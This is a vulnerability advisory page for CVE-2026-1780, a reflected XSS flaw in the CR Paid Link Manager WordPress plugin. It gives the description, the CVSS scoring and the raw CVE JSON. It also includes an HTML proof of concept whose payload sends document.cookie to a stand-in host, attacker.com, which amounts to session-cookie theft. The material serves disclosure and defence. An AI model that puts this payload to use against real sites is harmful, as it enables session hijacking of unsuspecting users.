Security Vulnerability Report
CVE-2026-1780 CVSS 6.1 MEDIUM

Published: 2026-03-18 04:17:14
Last Modified: 2026-04-22 21:32:08

Description

The [CR]Paid Link Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the URL path in all versions up to, and including, 0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CR Paid Link Manager WordPress plugin <= 0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CVE-2026-1780 PoC: Reflected XSS in CR Paid Link Manager -->
<!-- Target: WordPress site with CR Paid Link Manager plugin <= 0.5 -->
<!-- This PoC demonstrates how an attacker can inject JavaScript via URL path -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2026-1780 PoC</title>
</head>
<body>
  <h2>CVE-2026-1780 Reflected XSS PoC</h2>
  <p>Target: CR Paid Link Manager WordPress Plugin <= 0.5</p>

  <!-- Malicious URL that exploits the reflected XSS -->
  <p>Malicious URL:</p>
  <code id="malicious-url"></code>

  <script>
    // Generate the malicious URL
    var targetBase = window.location.origin + '/wp-content/plugins/crpaid-link-manager/';
    var xssPayload = '<script>alert("XSS - CVE-2026-1780");document.location="https://attacker.com/steal?cookie="+document.cookie</' + 'script>';
    var maliciousUrl = targetBase + xssPayload;
    document.getElementById('malicious-url').textContent = maliciousUrl;

    // Display the URL for testing
    console.log('Malicious URL:', maliciousUrl);

    /*
     * Attack Scenario:
     * 1. Attacker crafts a URL with XSS payload in the path
     * 2. Attacker tricks victim into clicking the link (social engineering)
     * 3. Victim's browser executes the injected JavaScript
     * 4. Attacker can steal cookies, session tokens, or perform actions as the victim
     *
     * Note: This is for educational and security testing purposes only.
     */
  </script>

  <!-- Alternative PoC: Direct link generation -->
  <button onclick="copyUrl()">Copy Malicious URL</button>
  <script>
    function copyUrl() {
      var url = document.getElementById('malicious-url').textContent;
      navigator.clipboard.writeText(url);
      alert('URL copied to clipboard');
    }
  </script>
</body>
</html>

References

https://plugins.trac.wordpress.org/log/crpaid-link-manager/tags?rev=3479722
https://www.wordfence.com/threat-intel/vulnerabilities/id/e5b00388-48b8-4e82-ab52-1cd3d02177b7?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-1780",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-18T04:17:14.073",
    "lastModified": "2026-04-22T21:32:08.360",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The [CR]Paid Link Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the URL path in all versions up to, and including, 0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."
      },
      {
        "lang": "es",
        "value": "El plugin [CR]Paid Link Manager para WordPress es vulnerable a cross-site scripting reflejado a través de la ruta URL en todas las versiones hasta la 0.5, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto permite a atacantes no autenticados inyectar scripts web arbitrarios en páginas que se ejecutan si logran engañar a un usuario para que realice una acción como hacer clic en un enlace."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/log/crpaid-link-manager/tags?rev=3479722",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e5b00388-48b8-4e82-ab52-1cd3d02177b7?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}